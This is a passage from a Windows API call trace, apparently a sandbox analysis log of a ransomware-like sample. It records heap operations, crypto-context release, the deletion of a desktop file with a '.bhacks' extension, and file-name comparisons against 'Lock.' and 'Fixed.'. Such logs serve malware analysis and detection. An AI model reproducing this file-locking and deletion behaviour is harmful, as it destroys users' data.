wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.628] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.628] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.628] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.628] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.628] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0101.628] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.628] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0101.628] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.628] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.628] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0101.628] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.628] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0101.628] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.628] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.628] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.628] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.628] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.628] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.628] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.629] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.629] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.629] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.629] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.629] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.629] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.629] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.629] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.629] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0101.629] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.629] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0101.629] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.629] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.629] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7060, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0101.629] CryptReleaseContext (hProv=0x9bf330, dwFlags=0x0) returned 1 [0101.629] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.629] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.629] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.629] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.629] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.629] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.629] FreeLibrary (hLibModule=0x76390000) returned 1 [0101.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.630] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.630] CloseHandle (hObject=0x44c) returned 1 [0101.631] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.631] CloseHandle (hObject=0x458) returned 1 [0101.634] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.634] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.634] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.634] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.634] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/j51yJlAI1.gif.bhacks", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif.bhacks", lpFilePart=0x8cedf4*="j51yJlAI1.gif.bhacks") returned 0x2c [0101.635] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\j51yjlai1.gif.bhacks")) returned 0x20 [0101.635] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif.bhacks", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2351d, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23c2351d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23e85b50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x10260, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="j51yJlAI1.gif.bhacks", cAlternateFileName="J51YJL~1.BHA")) returned 0x9a3b80 [0101.635] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\j51yjlai1.gif.bhacks")) returned 1 [0101.636] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2351d, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23c2351d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23e85b50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x10260, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="j51yJlAI1.gif.bhacks", cAlternateFileName="J51YJL~1.BHA")) returned 0 [0101.636] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0101.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75498 | out: hHeap=0x2af0000) returned 1 [0101.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0101.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0101.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.637] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0101.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0101.637] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0101.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0101.637] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6370 [0101.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0101.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0101.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0101.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0101.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0101.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0101.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0101.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0101.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75240 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6370 | out: hHeap=0x2af0000) returned 1 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0101.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0101.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0101.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0101.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5a) returned 0x2a68440 [0101.638] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/j51yJlAI1.gif.bhacks", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif.bhacks", lpFilePart=0x8cf650*="j51yJlAI1.gif.bhacks") returned 0x2c [0101.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0101.639] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\j51yJlAI1.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\j51yjlai1.gif.bhacks")) returned 0xffffffff [0101.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75240 | out: hHeap=0x2af0000) returned 1 [0101.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0101.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0101.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.639] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0101.639] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.639] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0101.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0101.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0101.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0101.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0101.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0101.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JkNoq.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kNoq.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Noq.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0101.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oq.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0101.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0101.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0101.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0101.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0101.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0101.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0101.640] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0101.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0101.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0101.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0101.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0101.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0101.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0101.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0101.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0101.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0101.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0101.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0101.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x22) returned 0x2a698b0 [0101.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0101.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JkNoq.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kNoq.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Noq.avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oq.avi.bhacks", cchCount1=6, lpString2="Fixed.", 